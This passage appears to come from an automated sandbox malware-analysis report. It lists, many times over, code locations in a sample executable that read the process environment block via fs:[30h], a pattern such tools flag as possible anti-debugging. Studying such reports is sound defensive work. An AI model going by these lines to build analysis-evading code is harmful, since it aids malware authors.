Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D2349 mov eax, dword ptr fs:[00000030h]	9_2_010D2349
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104D34C mov eax, dword ptr fs:[00000030h]	9_2_0104D34C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104D34C mov eax, dword ptr fs:[00000030h]	9_2_0104D34C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D035C mov eax, dword ptr fs:[00000030h]	9_2_010D035C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D035C mov eax, dword ptr fs:[00000030h]	9_2_010D035C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D035C mov eax, dword ptr fs:[00000030h]	9_2_010D035C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D035C mov ecx, dword ptr fs:[00000030h]	9_2_010D035C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D035C mov eax, dword ptr fs:[00000030h]	9_2_010D035C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D035C mov eax, dword ptr fs:[00000030h]	9_2_010D035C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01125341 mov eax, dword ptr fs:[00000030h]	9_2_01125341
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01049353 mov eax, dword ptr fs:[00000030h]	9_2_01049353
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01049353 mov eax, dword ptr fs:[00000030h]	9_2_01049353
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010F437C mov eax, dword ptr fs:[00000030h]	9_2_010F437C
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01057370 mov eax, dword ptr fs:[00000030h]	9_2_01057370
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01057370 mov eax, dword ptr fs:[00000030h]	9_2_01057370
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01057370 mov eax, dword ptr fs:[00000030h]	9_2_01057370
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110F367 mov eax, dword ptr fs:[00000030h]	9_2_0110F367
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107438F mov eax, dword ptr fs:[00000030h]	9_2_0107438F
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107438F mov eax, dword ptr fs:[00000030h]	9_2_0107438F
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104E388 mov eax, dword ptr fs:[00000030h]	9_2_0104E388
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104E388 mov eax, dword ptr fs:[00000030h]	9_2_0104E388
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104E388 mov eax, dword ptr fs:[00000030h]	9_2_0104E388
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0112539D mov eax, dword ptr fs:[00000030h]	9_2_0112539D
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010A739A mov eax, dword ptr fs:[00000030h]	9_2_010A739A
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010A739A mov eax, dword ptr fs:[00000030h]	9_2_010A739A
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01048397 mov eax, dword ptr fs:[00000030h]	9_2_01048397
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01048397 mov eax, dword ptr fs:[00000030h]	9_2_01048397
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01048397 mov eax, dword ptr fs:[00000030h]	9_2_01048397
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010733A5 mov eax, dword ptr fs:[00000030h]	9_2_010733A5
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010833A0 mov eax, dword ptr fs:[00000030h]	9_2_010833A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010833A0 mov eax, dword ptr fs:[00000030h]	9_2_010833A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110B3D0 mov ecx, dword ptr fs:[00000030h]	9_2_0110B3D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0105A3C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0105A3C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0105A3C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0105A3C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0105A3C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0105A3C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010583C0 mov eax, dword ptr fs:[00000030h]	9_2_010583C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010583C0 mov eax, dword ptr fs:[00000030h]	9_2_010583C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010583C0 mov eax, dword ptr fs:[00000030h]	9_2_010583C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010583C0 mov eax, dword ptr fs:[00000030h]	9_2_010583C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D63C0 mov eax, dword ptr fs:[00000030h]	9_2_010D63C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110C3CD mov eax, dword ptr fs:[00000030h]	9_2_0110C3CD
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011253FC mov eax, dword ptr fs:[00000030h]	9_2_011253FC
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010603E9 mov eax, dword ptr fs:[00000030h]	9_2_010603E9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010603E9 mov eax, dword ptr fs:[00000030h]	9_2_010603E9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010603E9 mov eax, dword ptr fs:[00000030h]	9_2_010603E9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010603E9 mov eax, dword ptr fs:[00000030h]	9_2_010603E9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010603E9 mov eax, dword ptr fs:[00000030h]	9_2_010603E9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010603E9 mov eax, dword ptr fs:[00000030h]	9_2_010603E9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010603E9 mov eax, dword ptr fs:[00000030h]	9_2_010603E9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010603E9 mov eax, dword ptr fs:[00000030h]	9_2_010603E9
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110F3E6 mov eax, dword ptr fs:[00000030h]	9_2_0110F3E6
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0106E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0106E3F0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0106E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0106E3F0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0106E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0106E3F0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010863FF mov eax, dword ptr fs:[00000030h]	9_2_010863FF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01087208 mov eax, dword ptr fs:[00000030h]	9_2_01087208
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01087208 mov eax, dword ptr fs:[00000030h]	9_2_01087208
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01125227 mov eax, dword ptr fs:[00000030h]	9_2_01125227
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104823B mov eax, dword ptr fs:[00000030h]	9_2_0104823B
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01049240 mov eax, dword ptr fs:[00000030h]	9_2_01049240
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01049240 mov eax, dword ptr fs:[00000030h]	9_2_01049240
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108724D mov eax, dword ptr fs:[00000030h]	9_2_0108724D
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110B256 mov eax, dword ptr fs:[00000030h]	9_2_0110B256
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110B256 mov eax, dword ptr fs:[00000030h]	9_2_0110B256
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D8243 mov eax, dword ptr fs:[00000030h]	9_2_010D8243
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D8243 mov ecx, dword ptr fs:[00000030h]	9_2_010D8243
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104A250 mov eax, dword ptr fs:[00000030h]	9_2_0104A250
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01056259 mov eax, dword ptr fs:[00000030h]	9_2_01056259
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010DD250 mov ecx, dword ptr fs:[00000030h]	9_2_010DD250
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100274 mov eax, dword ptr fs:[00000030h]	9_2_01100274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100274 mov eax, dword ptr fs:[00000030h]	9_2_01100274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100274 mov eax, dword ptr fs:[00000030h]	9_2_01100274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100274 mov eax, dword ptr fs:[00000030h]	9_2_01100274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100274 mov eax, dword ptr fs:[00000030h]	9_2_01100274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100274 mov eax, dword ptr fs:[00000030h]	9_2_01100274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100274 mov eax, dword ptr fs:[00000030h]	9_2_01100274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100274 mov eax, dword ptr fs:[00000030h]	9_2_01100274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100274 mov eax, dword ptr fs:[00000030h]	9_2_01100274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100274 mov eax, dword ptr fs:[00000030h]	9_2_01100274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100274 mov eax, dword ptr fs:[00000030h]	9_2_01100274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01100274 mov eax, dword ptr fs:[00000030h]	9_2_01100274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01054260 mov eax, dword ptr fs:[00000030h]	9_2_01054260
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01054260 mov eax, dword ptr fs:[00000030h]	9_2_01054260
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01054260 mov eax, dword ptr fs:[00000030h]	9_2_01054260
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104826B mov eax, dword ptr fs:[00000030h]	9_2_0104826B
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01079274 mov eax, dword ptr fs:[00000030h]	9_2_01079274
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01091270 mov eax, dword ptr fs:[00000030h]	9_2_01091270
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01091270 mov eax, dword ptr fs:[00000030h]	9_2_01091270
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111D26B mov eax, dword ptr fs:[00000030h]	9_2_0111D26B
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0111D26B mov eax, dword ptr fs:[00000030h]	9_2_0111D26B
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E284 mov eax, dword ptr fs:[00000030h]	9_2_0108E284
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108E284 mov eax, dword ptr fs:[00000030h]	9_2_0108E284
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D0283 mov eax, dword ptr fs:[00000030h]	9_2_010D0283
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D0283 mov eax, dword ptr fs:[00000030h]	9_2_010D0283
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D0283 mov eax, dword ptr fs:[00000030h]	9_2_010D0283
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01125283 mov eax, dword ptr fs:[00000030h]	9_2_01125283
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108329E mov eax, dword ptr fs:[00000030h]	9_2_0108329E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108329E mov eax, dword ptr fs:[00000030h]	9_2_0108329E
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010602A0 mov eax, dword ptr fs:[00000030h]	9_2_010602A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010602A0 mov eax, dword ptr fs:[00000030h]	9_2_010602A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010652A0 mov eax, dword ptr fs:[00000030h]	9_2_010652A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010652A0 mov eax, dword ptr fs:[00000030h]	9_2_010652A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010652A0 mov eax, dword ptr fs:[00000030h]	9_2_010652A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010652A0 mov eax, dword ptr fs:[00000030h]	9_2_010652A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E62A0 mov eax, dword ptr fs:[00000030h]	9_2_010E62A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E62A0 mov ecx, dword ptr fs:[00000030h]	9_2_010E62A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E62A0 mov eax, dword ptr fs:[00000030h]	9_2_010E62A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E62A0 mov eax, dword ptr fs:[00000030h]	9_2_010E62A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E62A0 mov eax, dword ptr fs:[00000030h]	9_2_010E62A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E62A0 mov eax, dword ptr fs:[00000030h]	9_2_010E62A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E72A0 mov eax, dword ptr fs:[00000030h]	9_2_010E72A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E72A0 mov eax, dword ptr fs:[00000030h]	9_2_010E72A0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D92BC mov eax, dword ptr fs:[00000030h]	9_2_010D92BC
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D92BC mov eax, dword ptr fs:[00000030h]	9_2_010D92BC
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D92BC mov ecx, dword ptr fs:[00000030h]	9_2_010D92BC
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010D92BC mov ecx, dword ptr fs:[00000030h]	9_2_010D92BC
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011192A6 mov eax, dword ptr fs:[00000030h]	9_2_011192A6
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011192A6 mov eax, dword ptr fs:[00000030h]	9_2_011192A6
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011192A6 mov eax, dword ptr fs:[00000030h]	9_2_011192A6
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011192A6 mov eax, dword ptr fs:[00000030h]	9_2_011192A6
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010592C5 mov eax, dword ptr fs:[00000030h]	9_2_010592C5
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010592C5 mov eax, dword ptr fs:[00000030h]	9_2_010592C5
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0105A2C3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0105A2C3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0105A2C3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0105A2C3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105A2C3 mov eax, dword ptr fs:[00000030h]	9_2_0105A2C3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107B2C0 mov eax, dword ptr fs:[00000030h]	9_2_0107B2C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107B2C0 mov eax, dword ptr fs:[00000030h]	9_2_0107B2C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107B2C0 mov eax, dword ptr fs:[00000030h]	9_2_0107B2C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107B2C0 mov eax, dword ptr fs:[00000030h]	9_2_0107B2C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107B2C0 mov eax, dword ptr fs:[00000030h]	9_2_0107B2C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107B2C0 mov eax, dword ptr fs:[00000030h]	9_2_0107B2C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107B2C0 mov eax, dword ptr fs:[00000030h]	9_2_0107B2C0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107F2D0 mov eax, dword ptr fs:[00000030h]	9_2_0107F2D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0107F2D0 mov eax, dword ptr fs:[00000030h]	9_2_0107F2D0
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104B2D3 mov eax, dword ptr fs:[00000030h]	9_2_0104B2D3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104B2D3 mov eax, dword ptr fs:[00000030h]	9_2_0104B2D3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0104B2D3 mov eax, dword ptr fs:[00000030h]	9_2_0104B2D3
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010602E1 mov eax, dword ptr fs:[00000030h]	9_2_010602E1
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010602E1 mov eax, dword ptr fs:[00000030h]	9_2_010602E1
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010602E1 mov eax, dword ptr fs:[00000030h]	9_2_010602E1
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0110F2F8 mov eax, dword ptr fs:[00000030h]	9_2_0110F2F8
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011252E2 mov eax, dword ptr fs:[00000030h]	9_2_011252E2
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010492FF mov eax, dword ptr fs:[00000030h]	9_2_010492FF
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_011012ED mov eax, dword ptr fs:[00000030h]	9_2_011012ED
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01087505 mov eax, dword ptr fs:[00000030h]	9_2_01087505
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01087505 mov ecx, dword ptr fs:[00000030h]	9_2_01087505
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010E6500 mov eax, dword ptr fs:[00000030h]	9_2_010E6500
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01124500 mov eax, dword ptr fs:[00000030h]	9_2_01124500
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01124500 mov eax, dword ptr fs:[00000030h]	9_2_01124500
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01124500 mov eax, dword ptr fs:[00000030h]	9_2_01124500
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01124500 mov eax, dword ptr fs:[00000030h]	9_2_01124500
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01124500 mov eax, dword ptr fs:[00000030h]	9_2_01124500
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01124500 mov eax, dword ptr fs:[00000030h]	9_2_01124500
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01124500 mov eax, dword ptr fs:[00000030h]	9_2_01124500
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01125537 mov eax, dword ptr fs:[00000030h]	9_2_01125537
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FF525 mov eax, dword ptr fs:[00000030h]	9_2_010FF525
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FF525 mov eax, dword ptr fs:[00000030h]	9_2_010FF525
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FF525 mov eax, dword ptr fs:[00000030h]	9_2_010FF525
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FF525 mov eax, dword ptr fs:[00000030h]	9_2_010FF525
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FF525 mov eax, dword ptr fs:[00000030h]	9_2_010FF525
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FF525 mov eax, dword ptr fs:[00000030h]	9_2_010FF525
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_010FF525 mov eax, dword ptr fs:[00000030h]	9_2_010FF525
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105D534 mov eax, dword ptr fs:[00000030h]	9_2_0105D534
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105D534 mov eax, dword ptr fs:[00000030h]	9_2_0105D534
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105D534 mov eax, dword ptr fs:[00000030h]	9_2_0105D534
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105D534 mov eax, dword ptr fs:[00000030h]	9_2_0105D534
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105D534 mov eax, dword ptr fs:[00000030h]	9_2_0105D534
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0105D534 mov eax, dword ptr fs:[00000030h]	9_2_0105D534
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01060535 mov eax, dword ptr fs:[00000030h]	9_2_01060535
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01060535 mov eax, dword ptr fs:[00000030h]	9_2_01060535
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01060535 mov eax, dword ptr fs:[00000030h]	9_2_01060535
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01060535 mov eax, dword ptr fs:[00000030h]	9_2_01060535
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01060535 mov eax, dword ptr fs:[00000030h]	9_2_01060535
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_01060535 mov eax, dword ptr fs:[00000030h]	9_2_01060535
Source: C:\Users\user\Desktop\zE1VxVoZ3W.exe	Code function: 9_2_0108D530 mov eax, dword ptr fs:[00000030h]	9_2_0108D530
